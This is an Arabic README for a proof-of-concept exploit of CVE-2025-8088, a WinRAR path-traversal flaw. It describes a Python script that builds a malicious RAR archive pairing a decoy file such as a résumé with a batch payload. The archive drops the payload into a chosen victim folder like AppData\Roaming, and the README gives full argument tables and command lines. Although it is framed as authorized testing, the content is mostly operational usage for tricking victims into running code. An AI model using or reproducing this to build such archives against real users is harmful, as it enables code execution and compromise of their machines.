
استغلال إثبات المفهوم لـ CVE-2025-8088، وهي ثغرة traversal للمسار في WinRAR تتيح تنفيذ التعليمات البرمجية التعسفي عبر أرشيفات RAR مصممة. يتضمن نص Python مع مسارات خداع وحمولة وإسقاط قابلة للتكوين لاختبار الأمان المصرح به.
Exploit_cve_2025_8088.ps1
python poc.py

| الوسيطة | الوصف | مثال |
|---|---|---|
--decoy | مسار ملف الإغراء (سيتم إنشاؤه إذا لم يكن موجودًا) | resume.txt |
--payload | مسار ملف الحمولة (سيتم إنشاؤه إذا لم يكن موجودًا) | payload.bat |
--drop | المسار المطلق للدليل الهدف حيث سيتم استخراج الحمولة | C:\Users\Victim\Documents |
| الوسيطة | الوصف | القيمة الافتراضية | ملاحظات |
|---|---|---|---|
--rar | مسار rar.exe | اكتشاف تلقائي | سيتحقق من المواقع الشائعة و PATH |
--out | اسم ملف RAR الناتج | poc-cve-2025-8088.rar | الأرشيف الخبيث النهائي |
--workdir | دليل العمل للملفات المؤقتة | الدليل الحالي (.) | |
--placeholder_len | طول العنصر النائب ADS | max(len(target_path), 128) | أطول = اجتياز أكثر موثوقية |
--max_up | عدد اجتيازات الدليل الأب (..\) | 16 | الحد الأدنى الموصى به 8 |
--base_out | اسم ملف RAR الأساسي الوسيط | <out>.base.rar | ملف مؤقت، يتم حذفه بعد |
# Basic usage (auto-discover rar.exe)
python poc.py --decoy resume.txt --payload payload.bat --drop "C:\Users\Victim\Documents"
# Full custom configuration
python poc.py \
--decoy document.pdf \
--payload script.bat \
--drop "C:\Users\Victim\AppData\Roaming" \
--rar "C:\Program Files\WinRAR\rar.exe" \
--out malicious.rar \
--workdir ./build \
--placeholder_len 150 \
--max_up 20